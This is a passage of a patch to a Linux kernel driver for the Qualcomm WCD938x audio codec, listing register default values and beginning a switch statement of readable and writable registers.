++	{WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL,                    0x40},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L,                   0x81},
++	{WCD938X_HPH_NEW_INT_RDAC_VREF_CTL,                    0x10},
++	{WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL,                0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R,                   0x81},
++	{WCD938X_HPH_NEW_INT_PA_MISC1,                         0x22},
++	{WCD938X_HPH_NEW_INT_PA_MISC2,                         0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC,                     0x00},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER1,                       0xFE},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER2,                       0x02},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER3,                       0x4E},
++	{WCD938X_HPH_NEW_INT_HPH_TIMER4,                       0x54},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC2,                    0x00},
++	{WCD938X_HPH_NEW_INT_PA_RDAC_MISC3,                    0x00},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW,               0x90},
++	{WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW,               0x90},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI,              0x62},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP,                 0x01},
++	{WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP,                   0x11},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL,            0x57},
++	{WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL,       0x01},
++	{WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT,                0x00},
++	{WCD938X_MBHC_NEW_INT_SPARE_2,                         0x00},
++	{WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON,                  0xA8},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON1,                     0x42},
++	{WCD938X_EAR_INT_NEW_CNP_VCM_CON2,                     0x22},
++	{WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS,                 0x00},
++	{WCD938X_AUX_INT_EN_REG,                               0x00},
++	{WCD938X_AUX_INT_PA_CTRL,                              0x06},
++	{WCD938X_AUX_INT_SP_CTRL,                              0xD2},
++	{WCD938X_AUX_INT_DAC_CTRL,                             0x80},
++	{WCD938X_AUX_INT_CLK_CTRL,                             0x50},
++	{WCD938X_AUX_INT_TEST_CTRL,                            0x00},
++	{WCD938X_AUX_INT_STATUS_REG,                           0x00},
++	{WCD938X_AUX_INT_MISC,                                 0x00},
++	{WCD938X_LDORXTX_INT_BIAS,                             0x6E},
++	{WCD938X_LDORXTX_INT_STB_LOADS_DTEST,                  0x50},
++	{WCD938X_LDORXTX_INT_TEST0,                            0x1C},
++	{WCD938X_LDORXTX_INT_STARTUP_TIMER,                    0xFF},
++	{WCD938X_LDORXTX_INT_TEST1,                            0x1F},
++	{WCD938X_LDORXTX_INT_STATUS,                           0x00},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_1,                     0x0A},
++	{WCD938X_SLEEP_INT_WATCHDOG_CTL_2,                     0x0A},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1,               0x02},
++	{WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2,               0x60},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2,               0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1,               0x7F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0,               0x3F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M,          0x1F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M,          0x0F},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1,          0xD7},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0,            0xC8},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP,           0xC6},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1,      0xD5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0,        0xCA},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP,       0x05},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0,    0xA5},
++	{WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP,       0x13},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1,             0x88},
++	{WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP,            0x42},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L2,                  0xFF},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L1,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_L0,                  0x64},
++	{WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP,                 0x77},
++	{WCD938X_DIGITAL_PAGE_REGISTER,                        0x00},
++	{WCD938X_DIGITAL_CHIP_ID0,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID1,                             0x00},
++	{WCD938X_DIGITAL_CHIP_ID2,                             0x0D},
++	{WCD938X_DIGITAL_CHIP_ID3,                             0x01},
++	{WCD938X_DIGITAL_SWR_TX_CLK_RATE,                      0x00},
++	{WCD938X_DIGITAL_CDC_RST_CTL,                          0x03},
++	{WCD938X_DIGITAL_TOP_CLK_CFG,                          0x00},
++	{WCD938X_DIGITAL_CDC_ANA_CLK_CTL,                      0x00},
++	{WCD938X_DIGITAL_CDC_DIG_CLK_CTL,                      0xF0},
++	{WCD938X_DIGITAL_SWR_RST_EN,                           0x00},
++	{WCD938X_DIGITAL_CDC_PATH_MODE,                        0x55},
++	{WCD938X_DIGITAL_CDC_RX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_RX0_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX1_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_RX2_CTL,                          0xFC},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1,                  0x00},
++	{WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3,                  0x00},
++	{WCD938X_DIGITAL_CDC_COMP_CTL_0,                       0x00},
++	{WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL,                   0x1E},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_0,                     0x63},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A2_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_0,                     0xAC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A3_1,                     0x04},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_0,                     0x1A},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A4_1,                     0x03},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_0,                     0xBC},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A6_0,                     0xC7},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_A7_0,                     0xF8},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_0,                      0x47},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_1,                      0x43},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_2,                      0xB1},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_C_3,                      0x17},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R1,                       0x4D},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R2,                       0x29},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R3,                       0x34},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R4,                       0x59},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R5,                       0x66},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R6,                       0x87},
++	{WCD938X_DIGITAL_CDC_HPH_DSM_R7,                       0x64},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_0,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A1_1,                     0x01},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_0,                     0x96},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A2_1,                     0x09},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_0,                     0xAB},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A3_1,                     0x05},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_0,                     0x1C},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A4_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_0,                     0x17},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A5_1,                     0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A6_0,                     0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_A7_0,                     0xE3},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_0,                      0x69},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_1,                      0x54},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_2,                      0x02},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_C_3,                      0x15},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R1,                       0xA4},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R2,                       0xB5},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R3,                       0x86},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R4,                       0x85},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R5,                       0xAA},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R6,                       0xE2},
++	{WCD938X_DIGITAL_CDC_AUX_DSM_R7,                       0x62},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0,                    0x55},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1,                    0xA9},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0,                   0x3D},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1,                   0x2E},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0,                   0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1,                   0xFC},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2,                   0x01},
++	{WCD938X_DIGITAL_CDC_HPH_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_AUX_GAIN_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_EAR_PATH_CTL,                     0x00},
++	{WCD938X_DIGITAL_CDC_SWR_CLH,                          0x00},
++	{WCD938X_DIGITAL_SWR_CLH_BYP,                          0x00},
++	{WCD938X_DIGITAL_CDC_TX0_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX1_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX2_CTL,                          0x68},
++	{WCD938X_DIGITAL_CDC_TX_RST,                           0x00},
++	{WCD938X_DIGITAL_CDC_REQ_CTL,                          0x01},
++	{WCD938X_DIGITAL_CDC_RST,                              0x00},
++	{WCD938X_DIGITAL_CDC_AMIC_CTL,                         0x0F},
++	{WCD938X_DIGITAL_CDC_DMIC_CTL,                         0x04},
++	{WCD938X_DIGITAL_CDC_DMIC1_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC2_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC3_CTL,                        0x01},
++	{WCD938X_DIGITAL_CDC_DMIC4_CTL,                        0x01},
++	{WCD938X_DIGITAL_EFUSE_PRG_CTL,                        0x00},
++	{WCD938X_DIGITAL_EFUSE_CTL,                            0x2B},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_1_2,                    0x11},
++	{WCD938X_DIGITAL_CDC_DMIC_RATE_3_4,                    0x11},
++	{WCD938X_DIGITAL_PDM_WD_CTL0,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL1,                          0x00},
++	{WCD938X_DIGITAL_PDM_WD_CTL2,                          0x00},
++	{WCD938X_DIGITAL_INTR_MODE,                            0x00},
++	{WCD938X_DIGITAL_INTR_MASK_0,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_1,                          0xFF},
++	{WCD938X_DIGITAL_INTR_MASK_2,                          0x3F},
++	{WCD938X_DIGITAL_INTR_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_INTR_STATUS_2,                        0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_CLEAR_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_0,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_1,                         0x00},
++	{WCD938X_DIGITAL_INTR_LEVEL_2,                         0x00},
++	{WCD938X_DIGITAL_INTR_SET_0,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_1,                           0x00},
++	{WCD938X_DIGITAL_INTR_SET_2,                           0x00},
++	{WCD938X_DIGITAL_INTR_TEST_0,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_1,                          0x00},
++	{WCD938X_DIGITAL_INTR_TEST_2,                          0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_EN,                       0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_0_1,                      0x00},
++	{WCD938X_DIGITAL_TX_MODE_DBG_2_3,                      0x00},
++	{WCD938X_DIGITAL_LB_IN_SEL_CTL,                        0x00},
++	{WCD938X_DIGITAL_LOOP_BACK_MODE,                       0x00},
++	{WCD938X_DIGITAL_SWR_DAC_TEST,                         0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_0,                     0x40},
++	{WCD938X_DIGITAL_SWR_HM_TEST_RX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_1,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_TX_2,                     0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_0,                        0x00},
++	{WCD938X_DIGITAL_SWR_HM_TEST_1,                        0x00},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_0,                        0x8F},
++	{WCD938X_DIGITAL_PAD_CTL_SWR_1,                        0x06},
++	{WCD938X_DIGITAL_I2C_CTL,                              0x00},
++	{WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE,                0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_0,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_TEST_CTL_1,                     0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_EFUSE_T_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_RX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX0,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX1,                      0xF1},
++	{WCD938X_DIGITAL_PAD_CTL_PDM_TX2,                      0xF1},
++	{WCD938X_DIGITAL_PAD_INP_DIS_0,                        0x00},
++	{WCD938X_DIGITAL_PAD_INP_DIS_1,                        0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_0,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_1,                     0x00},
++	{WCD938X_DIGITAL_DRIVE_STRENGTH_2,                     0x00},
++	{WCD938X_DIGITAL_RX_DATA_EDGE_CTL,                     0x1F},
++	{WCD938X_DIGITAL_TX_DATA_EDGE_CTL,                     0x80},
++	{WCD938X_DIGITAL_GPIO_MODE,                            0x00},
++	{WCD938X_DIGITAL_PIN_CTL_OE,                           0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_0,                       0x00},
++	{WCD938X_DIGITAL_PIN_CTL_DATA_1,                       0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_0,                         0x00},
++	{WCD938X_DIGITAL_PIN_STATUS_1,                         0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_CTL,                        0x00},
++	{WCD938X_DIGITAL_DIG_DEBUG_EN,                         0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_ADD,                      0x00},
++	{WCD938X_DIGITAL_ANA_CSR_DBG_CTL,                      0x48},
++	{WCD938X_DIGITAL_SSP_DBG,                              0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_0,                        0x00},
++	{WCD938X_DIGITAL_MODE_STATUS_1,                        0x00},
++	{WCD938X_DIGITAL_SPARE_0,                              0x00},
++	{WCD938X_DIGITAL_SPARE_1,                              0x00},
++	{WCD938X_DIGITAL_SPARE_2,                              0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_0,                          0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_1,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_2,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_3,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_4,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_5,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_6,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_7,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_8,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_9,                          0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_10,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_11,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
++	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
++	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
++	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
++	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
++	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
++	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
++	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
++};
++
++static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
++{
++	switch (reg) {
++	case WCD938X_ANA_PAGE_REGISTER:
++	case WCD938X_ANA_BIAS:
++	case WCD938X_ANA_RX_SUPPLIES:
++	case WCD938X_ANA_HPH:
++	case WCD938X_ANA_EAR:
++	case WCD938X_ANA_EAR_COMPANDER_CTL:
++	case WCD938X_ANA_TX_CH1:
++	case WCD938X_ANA_TX_CH2:
++	case WCD938X_ANA_TX_CH3:
++	case WCD938X_ANA_TX_CH4:
++	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
++	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
++	case WCD938X_ANA_MBHC_MECH:
++	case WCD938X_ANA_MBHC_ELECT:
++	case WCD938X_ANA_MBHC_ZDET:
++	case WCD938X_ANA_MBHC_BTN0:
++	case WCD938X_ANA_MBHC_BTN1:
++	case WCD938X_ANA_MBHC_BTN2:
++	case WCD938X_ANA_MBHC_BTN3:
++	case WCD938X_ANA_MBHC_BTN4:
++	case WCD938X_ANA_MBHC_BTN5:
++	case WCD938X_ANA_MBHC_BTN6:
++	case WCD938X_ANA_MBHC_BTN7:
++	case WCD938X_ANA_MICB1:
++	case WCD938X_ANA_MICB2:
++	case WCD938X_ANA_MICB2_RAMP:
++	case WCD938X_ANA_MICB3:
++	case WCD938X_ANA_MICB4:
++	case WCD938X_BIAS_CTL:
++	case WCD938X_BIAS_VBG_FINE_ADJ:
++	case WCD938X_LDOL_VDDCX_ADJUST:
++	case WCD938X_LDOL_DISABLE_LDOL:
++	case WCD938X_MBHC_CTL_CLK:
++	case WCD938X_MBHC_CTL_ANA:
++	case WCD938X_MBHC_CTL_SPARE_1:
++	case WCD938X_MBHC_CTL_SPARE_2:
++	case WCD938X_MBHC_CTL_BCS:
++	case WCD938X_MBHC_TEST_CTL:
++	case WCD938X_LDOH_MODE:
++	case WCD938X_LDOH_BIAS:
++	case WCD938X_LDOH_STB_LOADS:
++	case WCD938X_LDOH_SLOWRAMP:
++	case WCD938X_MICB1_TEST_CTL_1:
++	case WCD938X_MICB1_TEST_CTL_2:
++	case WCD938X_MICB1_TEST_CTL_3:
++	case WCD938X_MICB2_TEST_CTL_1:
++	case WCD938X_MICB2_TEST_CTL_2:
++	case WCD938X_MICB2_TEST_CTL_3:
++	case WCD938X_MICB3_TEST_CTL_1:
++	case WCD938X_MICB3_TEST_CTL_2:
++	case WCD938X_MICB3_TEST_CTL_3:
++	case WCD938X_MICB4_TEST_CTL_1:
++	case WCD938X_MICB4_TEST_CTL_2:
++	case WCD938X_MICB4_TEST_CTL_3:
++	case WCD938X_TX_COM_ADC_VCM:
++	case WCD938X_TX_COM_BIAS_ATEST:
++	case WCD938X_TX_COM_SPARE1:
++	case WCD938X_TX_COM_SPARE2:
++	case WCD938X_TX_COM_TXFE_DIV_CTL:
++	case WCD938X_TX_COM_TXFE_DIV_START:
++	case WCD938X_TX_COM_SPARE3:
++	case WCD938X_TX_COM_SPARE4:
++	case WCD938X_TX_1_2_TEST_EN:
++	case WCD938X_TX_1_2_ADC_IB:
++	case WCD938X_TX_1_2_ATEST_REFCTL:
++	case WCD938X_TX_1_2_TEST_CTL:
++	case WCD938X_TX_1_2_TEST_BLK_EN1:
++	case WCD938X_TX_1_2_TXFE1_CLKDIV:
++	case WCD938X_TX_3_4_TEST_EN:
++	case WCD938X_TX_3_4_ADC_IB:
++	case WCD938X_TX_3_4_ATEST_REFCTL:
++	case WCD938X_TX_3_4_TEST_CTL:
++	case WCD938X_TX_3_4_TEST_BLK_EN3:
++	case WCD938X_TX_3_4_TXFE3_CLKDIV:
++	case WCD938X_TX_3_4_TEST_BLK_EN2:
++	case WCD938X_TX_3_4_TXFE2_CLKDIV:
++	case WCD938X_TX_3_4_SPARE1:
++	case WCD938X_TX_3_4_TEST_BLK_EN4:
++	case WCD938X_TX_3_4_TXFE4_CLKDIV:
++	case WCD938X_TX_3_4_SPARE2:
++	case WCD938X_CLASSH_MODE_1:
++	case WCD938X_CLASSH_MODE_2:
++	case WCD938X_CLASSH_MODE_3:
++	case WCD938X_CLASSH_CTRL_VCL_1:
++	case WCD938X_CLASSH_CTRL_VCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_1:
++	case WCD938X_CLASSH_CTRL_CCL_2:
++	case WCD938X_CLASSH_CTRL_CCL_3:
++	case WCD938X_CLASSH_CTRL_CCL_4:
++	case WCD938X_CLASSH_CTRL_CCL_5:
++	case WCD938X_CLASSH_BUCK_TMUX_A_D:
++	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
++	case WCD938X_CLASSH_SPARE:
++	case WCD938X_FLYBACK_EN:
++	case WCD938X_FLYBACK_VNEG_CTRL_1:
++	case WCD938X_FLYBACK_VNEG_CTRL_2:
++	case WCD938X_FLYBACK_VNEG_CTRL_3:
++	case WCD938X_FLYBACK_VNEG_CTRL_4:
++	case WCD938X_FLYBACK_VNEG_CTRL_5:
++	case WCD938X_FLYBACK_VNEG_CTRL_6:
++	case WCD938X_FLYBACK_VNEG_CTRL_7:
++	case WCD938X_FLYBACK_VNEG_CTRL_8:
++	case WCD938X_FLYBACK_VNEG_CTRL_9:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
++	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
++	case WCD938X_FLYBACK_CTRL_1:
++	case WCD938X_FLYBACK_TEST_CTL:
++	case WCD938X_RX_AUX_SW_CTL:
++	case WCD938X_RX_PA_AUX_IN_CONN:
++	case WCD938X_RX_TIMER_DIV:
++	case WCD938X_RX_OCP_CTL:
++	case WCD938X_RX_OCP_COUNT:
++	case WCD938X_RX_BIAS_EAR_DAC:
++	case WCD938X_RX_BIAS_EAR_AMP:
++	case WCD938X_RX_BIAS_HPH_LDO:
++	case WCD938X_RX_BIAS_HPH_PA:
++	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
++	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
++	case WCD938X_RX_BIAS_HPH_CNP1:
++	case WCD938X_RX_BIAS_HPH_LOWPOWER:
++	case WCD938X_RX_BIAS_AUX_DAC:
++	case WCD938X_RX_BIAS_AUX_AMP:
++	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
++	case WCD938X_RX_BIAS_MISC:
++	case WCD938X_RX_BIAS_BUCK_RST:
++	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_ERRAMP:
++	case WCD938X_RX_BIAS_FLYB_BUFF:
++	case WCD938X_RX_BIAS_FLYB_MID_RST:
++	case WCD938X_HPH_CNP_EN:
++	case WCD938X_HPH_CNP_WG_CTL:
++	case WCD938X_HPH_CNP_WG_TIME:
++	case WCD938X_HPH_OCP_CTL:
++	case WCD938X_HPH_AUTO_CHOP:
++	case WCD938X_HPH_CHOP_CTL:
++	case WCD938X_HPH_PA_CTL1:
++	case WCD938X_HPH_PA_CTL2:
++	case WCD938X_HPH_L_EN:
++	case WCD938X_HPH_L_TEST:
++	case WCD938X_HPH_L_ATEST:
++	case WCD938X_HPH_R_EN:
++	case WCD938X_HPH_R_TEST:
++	case WCD938X_HPH_R_ATEST:
++	case WCD938X_HPH_RDAC_CLK_CTL1:
++	case WCD938X_HPH_RDAC_CLK_CTL2:
++	case WCD938X_HPH_RDAC_LDO_CTL:
++	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
++	case WCD938X_HPH_REFBUFF_UHQA_CTL:
++	case WCD938X_HPH_REFBUFF_LP_CTL:
++	case WCD938X_HPH_L_DAC_CTL:
++	case WCD938X_HPH_R_DAC_CTL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
++	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
++	case WCD938X_EAR_EAR_EN_REG:
++	case WCD938X_EAR_EAR_PA_CON:
++	case WCD938X_EAR_EAR_SP_CON:
++	case WCD938X_EAR_EAR_DAC_CON:
++	case WCD938X_EAR_EAR_CNP_FSM_CON:
++	case WCD938X_EAR_TEST_CTL:
++	case WCD938X_ANA_NEW_PAGE_REGISTER:
++	case WCD938X_HPH_NEW_ANA_HPH2:
++	case WCD938X_HPH_NEW_ANA_HPH3:
++	case WCD938X_SLEEP_CTL:
++	case WCD938X_SLEEP_WATCHDOG_CTL:
++	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
++	case WCD938X_MBHC_NEW_CTL_1:
++	case WCD938X_MBHC_NEW_CTL_2:
++	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
++	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
++	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
++	case WCD938X_TX_NEW_AMIC_MUX_CFG:
++	case WCD938X_AUX_AUXPA:
++	case WCD938X_LDORXTX_MODE:
++	case WCD938X_LDORXTX_CONFIG:
++	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
++	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
++	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
++	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
